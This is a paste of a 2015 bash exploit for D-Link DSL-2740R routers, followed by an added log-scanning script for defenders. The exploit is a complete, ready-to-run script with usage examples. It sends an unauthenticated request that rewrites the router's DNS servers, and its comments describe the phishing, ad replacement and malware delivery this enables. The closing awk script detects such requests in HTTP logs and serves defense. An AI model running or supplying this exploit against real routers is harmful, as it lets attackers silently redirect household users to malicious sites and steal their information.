hackerscommunity

D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit

Jul 11th, 2015
```bash
#!/bin/bash
#
#  D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
#  Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Description:
#  Different D-Link Routers are vulnerable to DNS change.
#  The vulnerability exists in the web interface, which is
#  accessible without authentication.
#
#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
#  DEVICES MAY BE AFFECTED.
#
#  Once modified, systems use foreign DNS servers, which are
#  usually set up by cybercriminals. Users with vulnerable
#  systems or devices who try to access certain sites are
#  instead redirected to possibly malicious sites.
#
#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#

if [[ $# -gt 3 || $# -lt 2 ]]; then
        echo "     D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
        echo "  ================================================================"
        echo "  Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
        echo "  Example: $0 192.168.1.1 8.8.8.8"
        echo "  Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
        echo ""
        echo "     Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
        echo "                  http://www.ethical-hacker.org/"
        exit;
fi
# GET is the lwp-request command-line client installed with libwww-perl
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
        echo "  Error : libwww-perl not found =/"
        exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1
```
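For defenders, the request this script sends is easy to spot in HTTP request logs. The following is an added example, not part of the original paste: it reports every request to `/Forms/dns_1` and marks whether the DNS servers it sets are on an approved list. The log layout (`<client-ip> <method> <uri>`), the sample lines and the function names are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original paste). Assumed log layout, one
# request per line: "<client-ip> <method> <uri>", e.g. exported from a
# proxy or network sensor that sees traffic to the router's web interface.

# Usage: scan_dns_form "<approved resolvers, space separated>" < http.log
scan_dns_form() {
    awk -v approved="$1" '
    BEGIN { n = split(approved, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    # Only the DNS form endpoint is of interest; every hit is reported.
    index($3, "/Forms/dns_1?") == 1 {
        primary = ""; secondary = ""
        query = substr($3, index($3, "?") + 1)
        m = split(query, kv, "&")
        for (i = 1; i <= m; i++) {
            eq = index(kv[i], "=")
            key = substr(kv[i], 1, eq - 1); val = substr(kv[i], eq + 1)
            if (key == "dnsPrimary")   primary = val
            if (key == "dnsSecondary") secondary = val
        }
        # Fail closed: empty, percent-encoded or unknown values do not
        # match the approved list and are reported as unapproved.
        verdict = "APPROVED_RESOLVERS"
        if (!(primary in ok) || (secondary != "" && !(secondary in ok)))
            verdict = "UNAPPROVED_RESOLVER"
        printf "%s src=%s primary=%s secondary=%s\n", verdict, $1, primary, secondary
    }'
}

# Constructed sample log lines (documentation and private addresses only).
sample_log() {
    cat <<'EOF'
192.168.1.23 GET /index.html
192.168.1.50 GET /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4
203.0.113.7 GET /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=198.51.100.53&dnsSecondary=
192.168.1.23 GET /Forms/dns_10?x=1
EOF
}

sample_log | scan_dns_form "8.8.8.8 8.8.4.4"
```

Any hit on this endpoint from a client that is not an administrator's workstation deserves a look, and a hit from outside the LAN means the router's web interface is reachable from the WAN side.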